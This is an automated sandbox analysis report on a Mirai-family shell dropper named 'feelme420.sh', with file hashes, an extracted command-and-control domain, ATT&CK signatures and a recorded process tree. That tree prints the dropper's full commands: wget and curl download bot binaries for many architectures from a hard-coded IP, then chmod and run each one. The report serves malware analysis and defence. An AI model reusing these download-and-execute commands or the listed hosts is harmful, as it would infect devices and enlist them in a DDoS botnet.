Analysis
-
max time kernel
119s -
max time network
124s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
19-12-2024 07:08
Static task
static1
Behavioral task
behavioral1
Sample
feelme420.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
feelme420.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
feelme420.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
feelme420.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
feelme420.sh
-
Size
3KB
-
MD5
22e9d65b991f00de3a52071664dc52f9
-
SHA1
2b6dd972572c4c72ecf43bb7b66eebe776cd0360
-
SHA256
7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b
-
SHA512
eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb
Malware Config
Extracted
mirai
chernobyl.stressing.world
Extracted
mirai
chernobyl.stressing.world
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 772 chmod 809 chmod 848 chmod 869 chmod 881 chmod 725 chmod 733 chmod 739 chmod 815 chmod 863 chmod 875 chmod 753 chmod 893 chmod 791 chmod 829 chmod 887 chmod -
Executes dropped EXE 16 IoCs
ioc pid Process /tmp/f331m3420 726 f331m3420 /tmp/f331m3420 734 f331m3420 /tmp/f331m3420 740 f331m3420 /tmp/f331m3420 755 f331m3420 /tmp/f331m3420 774 f331m3420 /tmp/f331m3420 793 f331m3420 /tmp/f331m3420 810 f331m3420 /tmp/f331m3420 816 f331m3420 /tmp/f331m3420 830 f331m3420 /tmp/f331m3420 849 f331m3420 /tmp/f331m3420 864 f331m3420 /tmp/f331m3420 870 f331m3420 /tmp/f331m3420 876 f331m3420 /tmp/f331m3420 882 f331m3420 /tmp/f331m3420 888 f331m3420 /tmp/f331m3420 894 f331m3420 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 728 wget 731 curl 732 cat -
Writes file to tmp directory 31 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/feelme420.i586 curl File opened for modification /tmp/feelme420.mpsl wget File opened for modification /tmp/feelme420.mpsl curl File opened for modification /tmp/feelme420.arm7 curl File opened for modification /tmp/feelme420.sh4 curl File opened for modification /tmp/feelme420.spc curl File opened for modification /tmp/feelme420.x86_64 wget File opened for modification /tmp/feelme420.i686 curl File opened for modification /tmp/feelme420.x86 wget File opened for modification /tmp/feelme420.ppc curl File opened for modification /tmp/feelme420.m68k curl File opened for modification /tmp/feelme420.spc wget File opened for modification /tmp/feelme420.arc wget File opened for modification /tmp/feelme420.i686 wget File opened for modification /tmp/feelme420.i486 wget File opened for modification /tmp/feelme420.mips curl File opened for modification /tmp/feelme420.arm5 wget File opened for modification /tmp/feelme420.arm7 wget File opened for modification /tmp/feelme420.sh4 wget File opened for modification /tmp/feelme420.mips wget File opened for modification /tmp/feelme420.arm6 curl File opened for modification /tmp/feelme420.m68k wget File opened for modification /tmp/feelme420.i486 curl File opened for modification /tmp/feelme420.x86 curl File opened for modification /tmp/feelme420.arm curl File opened for modification /tmp/feelme420.ppc wget File opened for modification /tmp/feelme420.arc curl File opened for modification /tmp/feelme420.arm5 curl File opened for modification /tmp/feelme420.x86_64 curl File opened for modification /tmp/f331m3420 feelme420.sh File opened for modification /tmp/feelme420.arm6 wget
Processes
-
/tmp/feelme420.sh/tmp/feelme420.sh1⤵
- Writes file to tmp directory
PID:697 -
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.x862⤵
- Writes file to tmp directory
PID:704
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/catcat feelme420.x862⤵PID:723
-
-
/bin/chmodchmod +x f331m3420 feelme420.sh feelme420.x86 systemd-private-17bbbb0f29ad499e9de91ce9ceeb7e2b-systemd-timedated.service-OtI5tN2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:726
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:728
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/bin/catcat feelme420.mips2⤵
- System Network Configuration Discovery
PID:732
-
-
/bin/chmodchmod +x f331m3420 feelme420.mips feelme420.sh feelme420.x86 systemd-private-17bbbb0f29ad499e9de91ce9ceeb7e2b-systemd-timedated.service-OtI5tN2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:734
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.mpsl2⤵
- Writes file to tmp directory
PID:736
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/catcat feelme420.mpsl2⤵PID:738
-
-
/bin/chmodchmod +x f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-17bbbb0f29ad499e9de91ce9ceeb7e2b-systemd-timedated.service-OtI5tN2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:740
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm2⤵PID:741
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/catcat feelme420.arm2⤵PID:752
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x862⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:755
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm52⤵
- Writes file to tmp directory
PID:757
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/catcat feelme420.arm52⤵PID:771
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x862⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:774
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm62⤵
- Writes file to tmp directory
PID:777
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:782
-
-
/bin/catcat feelme420.arm62⤵PID:790
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x862⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:793
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm72⤵
- Writes file to tmp directory
PID:798
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/catcat feelme420.arm72⤵PID:808
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x862⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:810
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.ppc2⤵
- Writes file to tmp directory
PID:812
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/catcat feelme420.ppc2⤵PID:814
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x862⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:816
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.m68k2⤵
- Writes file to tmp directory
PID:818
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/catcat feelme420.m68k2⤵PID:828
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x862⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:830
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.sh42⤵
- Writes file to tmp directory
PID:834
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/catcat feelme420.sh42⤵PID:846
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x862⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:849
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.spc2⤵
- Writes file to tmp directory
PID:852
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/catcat feelme420.spc2⤵PID:862
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x862⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:864
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arc2⤵
- Writes file to tmp directory
PID:866
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/catcat feelme420.arc2⤵PID:868
-
-
/bin/chmodchmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x862⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:870
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.x86_642⤵
- Writes file to tmp directory
PID:872
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/catcat feelme420.x86_642⤵PID:874
-
-
/bin/chmodchmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_642⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:876
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i6862⤵
- Writes file to tmp directory
PID:878
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/catcat feelme420.i6862⤵PID:880
-
-
/bin/chmodchmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_642⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:882
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i4862⤵
- Writes file to tmp directory
PID:884
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i4862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/catcat feelme420.i4862⤵PID:886
-
-
/bin/chmodchmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_642⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:888
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i5862⤵PID:890
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i5862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/catcat feelme420.i5862⤵PID:892
-
-
/bin/chmodchmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i586 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_642⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:894
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD571b0c2e7cc122d6de4a481bea5ebc6d9
SHA1f982ae244188ddd93b797e9548e049b97d2f2c7f
SHA256de0eaed88adb239921c42f1f8038523d53c735f01992fe773f54e1d181750833
SHA512f38ed5895d7c420b15688de521df6fc394ae9e1690a5f3628f22bd6489dab21ec8e9fa6dcfca40082d5099763d10b680bba3b43ef6f71016132958aa9a0d7f43
-
Filesize
114KB
MD5e10ad3d97637588b2056db57a546fa7f
SHA1138efa03e54a9f1eaed0e587ea259c182a1289d1
SHA2561ea71a6d347541c7f892d7361fbda4b282fcf5d11aeb7297a8345ce88f78865a
SHA512c6a9455aa701260796fa9f9b466dccf1166bb11cf3c0d9896f43ea9936f695ace78863f230362b884249bc3a110a3e1f4ad659ea5e9163261fb0bc1c349dd71a
-
Filesize
114KB
MD5c5d1f6a6e591069acffcaeb19c405a02
SHA11265bbf1ff14c6b913ced2f63807aaa93137d87b
SHA2566e4e8f08dd7471f62194314808a2d1a19b53db947c707a8839ce56c453656049
SHA51264d63427c40954e8b6c56b2bf56533ed3b06bc347b7add89e15e59fa7ca62ae744ec398384487621b5ace6dd6a6fcb9fe71cdabbcd5ef7379441d9ec779ac5ae
-
Filesize
218B
MD59efd7ff37a85d83af5298b3671491070
SHA124c2fbed0abb244b610f6aa0a429c50902d7a682
SHA256a90c0ae7235ef04a7df3797ab4f15c35e1d5f04fafbf06d81df3e6ce82e7a7b4
SHA51220204386063b3ea13c5db7527c80c8f651b8b6b003c8282335e79f4ded81aabf8e36bed2d238c6da09360e9f94cec954993eb366b409a38b4720c376621c4cf8
-
Filesize
63KB
MD58e8b3e650b8b979fca40999c2aef8077
SHA1af3f71ef4f46e03afc6c060ff3fdb858b98a54eb
SHA256ec953f9e9a20a77753750cf458536542c6e1a6871ea73e2d4dfb74b7055898c4
SHA512bb940245f77d7a2d886e71561f7d3a2beb3f6f0ada5a3a61718abe947be028a93a6eb21833e07d1710f4b425c0767184f5cd41890e81fefcd66e12273971151f
-
Filesize
146KB
MD5b7536c5b903a574ffaa59cfeb0128de9
SHA1077228fbc23181fcb09760048b8cf95ec2210691
SHA256f41a69c32274aa2c39ee0b5f30a025a8991265ba6df831837a6d4bc0a144e068
SHA512f179c04a5d7ae674b14a95efdc114f3365c7f7476c570f77a9fa9cac9a3bf4262a0fc252c933dab87ca24d7df7c9f74091e61986d7bb1b66c694fb4b03d0c099